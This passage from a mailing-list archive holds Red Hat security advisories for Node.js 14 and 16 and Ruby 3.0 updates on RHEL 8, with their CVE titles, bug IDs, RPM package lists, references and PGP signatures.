page(s) listed in the References section.

Bug Fix(es):

* nodejs:14/nodejs: rebase to latest upstream release (BZ#2106367)

* nodejs:14/nodejs: Specify --with-default-icu-data-dir when using  
bootstrap build (BZ#2111417)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2102001 - CVE-2022-33987 got: missing verification of requested URLs allows redirects to UNIX sockets  
2105422 - CVE-2022-32212 nodejs: DNS rebinding in --inspect via invalid IP addresses  
2105426 - CVE-2022-32215 nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding  
2105428 - CVE-2022-32214 nodejs: HTTP request smuggling due to improper delimiting of header fields  
2105430 - CVE-2022-32213 nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
2106367 - nodejs:14/nodejs: rebase to latest upstream release [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16231+7c1b33d9.src.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.src.rpm

aarch64:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm

noarch:  
nodejs-docs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16231+7c1b33d9.noarch.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.noarch.rpm

ppc64le:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm

s390x:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.s390x.rpm

x86_64:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32212  
https://access.redhat.com/security/cve/CVE-2022-32213  
https://access.redhat.com/security/cve/CVE-2022-32214  
https://access.redhat.com/security/cve/CVE-2022-32215  
https://access.redhat.com/security/cve/CVE-2022-33987  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB7NzjgjWX9erEAQi+GhAAiXG9iBXr215vvQfz+nTteMZatx8rYbmP  
SMj+YySptChtc8Y1BZvbB6uyhDtNYkkz1qWiNCw1nrbNBtI2XrbUWg06TNf+7AFZ  
HYkwtC77dT1Pm09AgXK0F3s1sckigqilY4hYnI25MjavOXZ0eXkbPXeQbFlyDKLG  
JB3qc2or3Zjcbx2bGPGa1vTaBghpmV72h6UK38EOeq2fs/Hmoid2uZt+0o4D9P9j  
9PYTqhVCapZIZkCZszXAqhO+8+AFymip1h1NVD48Il57NpTXcw+3luwfBx6KSdQj  
eb68MzmO0f75G2bMlPXB2r+f5f0Yr+k/7ljKvCd6CiQc2vJTuh4ojIthue4b9bNR  
++SNS5za43IPa/SYpojqHWMXrDSQR7GfR4VmN4CP4Hhn/7T9oL6pVf168zIARsvG  
/qA6fqh2k768el1V1STK+2Cum2i6mDGNvREp1KqnEnkVkWxRUVY0ZGCesEwX2jaV  
pPmk74abdZUeCja3OYFD9Ca99R2PWD7qfTVhuJJQJlZMlyFmf41SUfwzY0O4INsA  
FRhCxlKZL8BtiMiykzXOofax06NNBFNIXYbzBYBGqqZm8hiYXwdsWXI1tFe8RZSV  
aJeC5Qc7labBGhpSHkReIsjC/0RJ2zg8jE6axvhcA656F2Jb590Dmyy2T+OEX6HO  
OzI3A+IYzXw=  
=hjLi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6448-01

Red Hat Security Advisory 2022-6449-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:16 security and bug fix update  
Advisory ID:       RHSA-2022:6449-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6449  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-3807 CVE-2022-32212 CVE-2022-32213   
                   CVE-2022-32214 CVE-2022-32215 CVE-2022-33987   
=====================================================================

1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching  
ANSI escape codes (CVE-2021-3807)

* nodejs: DNS rebinding in --inspect via invalid IP addresses  
(CVE-2022-32212)

* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
(CVE-2022-32213)

* nodejs: HTTP request smuggling due to improper delimiting of header  
fields (CVE-2022-32214)

* nodejs: HTTP request smuggling due to incorrect parsing of multi-line  
Transfer-Encoding (CVE-2022-32215)

* got: missing verification of requested URLs allows redirects to UNIX  
sockets (CVE-2022-33987)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs:16/nodejs: rebase to latest upstream release (BZ#2106369)

* nodejs:16/nodejs: Specify --with-default-icu-data-dir when using  
bootstrap build (BZ#2111416)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes  
2102001 - CVE-2022-33987 got: missing verification of requested URLs allows redirects to UNIX sockets  
2105422 - CVE-2022-32212 nodejs: DNS rebinding in --inspect via invalid IP addresses  
2105426 - CVE-2022-32215 nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding  
2105428 - CVE-2022-32214 nodejs: HTTP request smuggling due to improper delimiting of header fields  
2105430 - CVE-2022-32213 nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
2106369 - nodejs:16/nodejs: rebase to latest upstream release [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.aarch64.rpm

noarch:  
nodejs-docs-16.16.0-3.module+el8.6.0+16248+76b0e185.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.ppc64le.rpm

s390x:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.s390x.rpm

x86_64:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-3807  
https://access.redhat.com/security/cve/CVE-2022-32212  
https://access.redhat.com/security/cve/CVE-2022-32213  
https://access.redhat.com/security/cve/CVE-2022-32214  
https://access.redhat.com/security/cve/CVE-2022-32215  
https://access.redhat.com/security/cve/CVE-2022-33987  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB5tzjgjWX9erEAQjcVQ/+Pcpf3Z3/DDwJh4jY2GGrA/WhG0SvMeTm  
YQxAaRYuhfOlxxjTiiAaUVd1DYdhPpussgGnE7CcRkoK5lR8cbmB6c74xdyjQFau  
D2G4YAVGRXyVT3kg0wP3QB7UdZH1rB9KI+5RhHMmkBBA4EpHwxxAmMSnsvWut3E+  
ocKV+0dPvdPU4AemtUKC9gAjrPDfi+4CFfHhEDWLuATSRmL/pDDiz2WLM06A3u/r  
DudYd1iNEoNLM/aA8HULhA4FTk+8RKoAuNcfO7rJQVhWtOdvJPK5GuJMziDEhToP  
aK1r84ShqzXmmxVu0CWYN3saYaf7BD51RiA7eFjzYFbjRSmqzfxvluLVEqM2HnQq  
3yMSOgk/wO79gqpkWIa4DU6+LPWEjDj9y1sJIIN2XFHScXIAv7NwhoxH4R7D5Pe2  
bj5MOmUa64DJGOjwKiLZ7yCjJHpm7RpVuNK3v9wvwoKRcGOEMlkNpbHtgMOiWslC  
ljCy6v7QmYGSThzKTfTsB6QjIUSjDr6x0GCCl87TrYNDDUxhBybCk+i0+9EpXB7j  
0DUiK3GhID7JRIMA5nFRrmpY9AIjeV5hMq2GCjHk3g3wGSk59rHZeKEQSVC+ZAmX  
EzMOFxa62RDOkxkOBrqa4U4kCXzHmtJsJgGKRKV3GwdDd/+C8LmBAlguB9Dumaz/  
l0sgCdVTvRU=  
=n6kC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6449-01

Red Hat Security Advisory 2022-6450-01 - Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Issues addressed include denial of service, double free, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: ruby:3.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6450-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6450  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-41817 CVE-2021-41819 CVE-2022-28738   
                   CVE-2022-28739   
=====================================================================

1. Summary:

An update for the ruby:3.0 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Ruby is an extensible, interpreted, object-oriented, scripting language. It  
has features to process text files and to perform system management tasks.

The following packages have been upgraded to a later upstream version: ruby  
(3.0.4). (BZ#2109431)

Security Fix(es):

* ruby: Regular expression denial of service vulnerability of Date parsing  
methods (CVE-2021-41817)

* ruby: Cookie prefix spoofing in CGI::Cookie.parse (CVE-2021-41819)

* Ruby: Double free in Regexp compilation (CVE-2022-28738)

* Ruby: Buffer overrun in String-to-Float conversion (CVE-2022-28739)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* ruby 3.0: User-installed rubygems plugins are not being loaded [RHEL8]  
(BZ#2110981)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2025104 - CVE-2021-41817 ruby: Regular expression denial of service vulnerability of Date parsing methods  
2026757 - CVE-2021-41819 ruby: Cookie prefix spoofing in CGI::Cookie.parse  
2075685 - CVE-2022-28738 Ruby: Double free in Regexp compilation  
2075687 - CVE-2022-28739 Ruby: Buffer overrun in String-to-Float conversion  
2109431 - ruby:3.0/ruby: Rebase to the latest Ruby 3.0 release [rhel-8] [rhel-8.6.0.z]  
2110981 - ruby 3.0: User-installed rubygems plugins are not being loaded [RHEL8] [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.src.rpm  
rubygem-abrt-0.4.0-1.module+el8.5.0+11580+845038eb.src.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.src.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.src.rpm

aarch64:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm

noarch:  
ruby-default-gems-3.0.4-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
ruby-doc-3.0.4-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-abrt-0.4.0-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-abrt-doc-0.4.0-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-bundler-2.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-irb-1.3.5-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-minitest-5.14.2-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-mysql2-doc-0.5.3-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-pg-doc-1.2.3-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-power_assert-1.2.0-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rake-13.0.3-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rbs-1.4.0-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rdoc-6.3.3-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rexml-3.2.5-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rss-0.2.9-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-test-unit-3.3.7-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-typeprof-0.15.2-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygems-3.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygems-devel-3.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm

ppc64le:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm

s390x:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm

x86_64:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-41817  
https://access.redhat.com/security/cve/CVE-2021-41819  
https://access.redhat.com/security/cve/CVE-2022-28738  
https://access.redhat.com/security/cve/CVE-2022-28739  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB39zjgjWX9erEAQhxWw/+KSmwOTYjC11C1DDOcN3gyX3jVPdq04pL  
SEeobwoattaVo7kvVHRMFncpWiqrGY4j2V7vEFUh0ejKF8PxSVBYwxB+NfNmD2V3  
l8XEaFGq0/l8GHBFEc2IqAP4wmXhECxE3nI2eaOBm0FYlQIHnw9vmvck0uxelZQ5  
MoNLPMmq5X3tD6E8bbJvg0JbkemcQF8Q6tfKlAHIsvsc4cthCNcTPa8gyN1uXH+0  
pEG5MMxRC+06lTStqQVKbbyVSDmHoaQBjXhNo9NROlgkvqwLAhrWZzDMLs/4d7fS  
3Cy/p80vWpVg56M3oPIY4OMfMgNwrLwfLqCJWFA0IcdYhffClzorMiCs85MteWQA  
zYZoaKFOf0m38TD1yTOtjcXoHrtbLfXsnQFu5R08SyBCj7ppI1IUE8rCHvNtDnCp  
CQke/GAHoNeFBppAsfseDkOndutSipImmygGhX05QI5gvRC3/Cz/nAvZX9TpNia5  
SlVsO8w9XJIvtbcLjOkHBjFuGpZ71bHNBOqveRkfuE6q3W6TXKpqhTlkipdrb41L  
6nuJKNm89/Hi++5RKmv6YJRDfLr86K9StCBtrvEqgV9XTt6ppwEI/0uzbVFhPtVi  
i1dh8XruZEtAMUqUToc3jj4gGZgn9deXfNgZxp1phVMjKq1CRpG965xCM3yE9iPV  
4jmxeiFCqp0=  
=YJLI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6450-01

